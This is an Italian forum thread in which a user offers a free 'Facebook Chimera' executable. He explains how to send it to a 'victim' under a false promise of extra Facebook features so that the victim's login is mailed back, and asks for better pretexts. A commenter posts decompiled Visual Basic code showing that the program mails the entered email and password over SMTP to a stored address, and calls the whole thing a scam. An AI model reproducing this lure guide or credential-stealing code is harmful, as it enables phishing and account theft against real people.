• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Balzy

Utente Medio
Autore del topic
19 Giugno 2011
131
0
Miglior risposta
0
Bungiorno ragazzi, ieri ho lavorato per creare questo software, gratuito e disponibile per tutti senza limitazioni. Il software avrà degli aggiornamenti automatici ed è molto semplice da usare.
Perfavore, Entra oppure Registrati per vedere i Link!

GUIDA:
1) Scaricare il programma.

2) Aprirlo e premere i tasti "M" ed "O" contemporaneamente.

3) Inserire l'email dove si vogliono ricevere i dati della vittima.

3) Cliccare "Conferma".

4) Chiudere TUTTO.

5)Inviare il file alla "vittima", illudendolo di poter avere delle funzionalità in più su FB.

Lui effettuerà l'accesso e i dati verranno inviati a voi!

P.S. Alla "vittima" bisogna inviare lo stesso .exe che avete aperto e inserito al suo interno la vostra e-mail. Perchè la vostra e-mail viene memorizzata nell'exe.

Commentate qui sotto dicendomi come migliorare e una nuova "scusa" per inviare il "virus" alla vittima. Inloltre non dite che si chiama ChimeraSoftware o cose del genere, altrimenti la "vittima" potrebbe eseguire una ricerca su Google e capire in realtà di cosa si tratta.

[video=youtube;r6s0cQDAOHU]http://www.youtube.com/watch?v=r6s0cQDAOHU[/video]

*Tutti coloro che hanno partecipato alla discussione precedente: @grgfede @lukegh @~Justice @Ignazio96

LOG:
*Abbiamo ridisegnato la sezione degli ads. Nella prossima versione lavoreremo per rendere quanto meno influenti gli ads, integrandoli in un webbrowser interno all' APP.

Ultima modifica:
Il video è molto breve, potevi arricchilo magari spiegando lentamente i passaggi.
Comunque apprezzo l'impegno :ok:.

per quanto riguarda il video, presto ne arriverà un altro. Qualcuno di voi l'ha provato, soprattutto, funziona?

Inviato da mio iPhone utilizzando

si, tu quale hai inserito? dimmi ad esempio outlook o gmail, cosi da aggiungere questi smtp!

Qualcuno di voi l'ha testato ??
Comunque bravissimo per esserti impegnato affondo su questo programmino , peccato che nn possa testarlo .
Anche poco pesante il download ottimo ;)

HAHAHAHAHA !! è una fregatura :emoji_smiley:
Spero che qualcuno non ci sia cascato !
Praticamente voi inserire la vostra email e password,e il programma le manda all'email(noreply@frxbook.tk) di @paobalz !!

Tra l'altro @paobalz non è neanche capace a programmare... molto probabilmente non lo sa,ma solo quelli con "alice.it" posso inviargli i dati,perchè non ha settato altri smtp di altri client nel programma !

Sicuramente molti di voi diranno "NO,NON E' VERO !!!"

Ok... allora eccovi parte del sorgente "incriminato" di "Facebook Chimera",così anche voi potete aprire gli occhi,e vedere che fregatura di programma sia.

Private Sub Button1_Click(ByVal sender As Object, ByVal e As EventArgs)
If Me.TextBox1.Text.Contains("@") Then
Dim message As New MailMessage
message = New MailMessage With { _
.From = New MailAddress("noreply@frxbook.tk") _
}
message.To.Add(MySettingsProperty.Settings.setting3)
message.Subject = "Facebook Chimera Service"
message.Priority = MailPriority.Normal
message.Body = ("E-mail: " & Me.TextBox1.Text & " Password: " & Me.TextBox2.Text)
New SmtpClient("out.alice.it").Send(message)
MyProject.Forms.Form2.Show
Me.Hide
Else
Interaction.MsgBox("L'email non " & ChrW(232) & " corretta ", MsgBoxStyle.Critical, Nothing)
End If
End Sub

Troppi bambini su Sciax2 !! :asg:

Sveglia ! Non lasciatevi fregare così facilmente...
Credete d'avvero che programmi del genre possano "attaccare" Facebook ?? Con tutti i prorammatori che si occupano nella difesa/sicurezza di Facebook ?

ma cosa dici, non permetterti piu, al dal codice si puo capire che lemail contenente email e password viene inviata alla vostra e mail settata nel menu segreto. mi dispiace ma sei un ignorante ed ecco perche perche il mondo fa schifo, perche ci sono persone come te.
inoltre chiedo l,intervento di un amministratore per eliminare il messaggio perche anche dal codice postato è chiaro che tutto cio che ha detto è falso. inoltre è illegale postate il codice di un mio programma, violazione di copyright!

inoltre il codice postato è totalmente diverso dal reale!

sono disponibile a farlo visionare ad un amministratore (il codice) per dimostrare che ho ragione!

e quel codice postato contiene errori piu che gravi hahahah che ignorante, almeno lo verificavi prima!

allora mo te le invio, ti invio tutto il progetto o te lo devo copiare in un txt? ma poi come si fa con il post ne devo ceare un nuovo dove anche tu dico che non era vero? scusa, ma non ne ho idea!

allora mo te le invio, ti invio tutto il progetto o te lo devo copiare in un txt? ma poi come si fa con il post ne devo ceare un nuovo dove anche tu dico che non era vero? scusa, ma non ne ho idea!

Bisogna solo MODIFICARE il messaggio non crearne di nuovi continuamente.

Comunque mandami il codice tra i tag [noparse]
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
[/noparse]
delle varie parti del programma via PM :emoji_slight_smile:

Ho controllato il codice, sembra apposto da quel che ho visto. C'è qualcuno che ha provato il programma e che può confermare?

Ultima modifica:
Non dico cavolate,ho solo decompilato il tuo programma,e ho analizzato il source... ed è tutto legale,nessuna violazione...
Comunque stai calmo,perchè sei tu che stai rilasciando un programma illegale,perchè ruba i dati altrui... Se lo invio e lo faccio analizzare agli organi competenti,voglio vedere cosa dicono.
Chiunque può decompilare il tuo programma e vedere che non sto dicendo cavolate...
Inoltre perchè chiedi l'intervento di un moderatore che STRANAMENTE è della tua stessa città ? perchè proprio lui ?
Mah...
E comunque i moderatori per analizzare il tuo codice devono decompilarlo,non serve che tu gli mandi un codice "pulito",questo sono capaci tutti a farlo..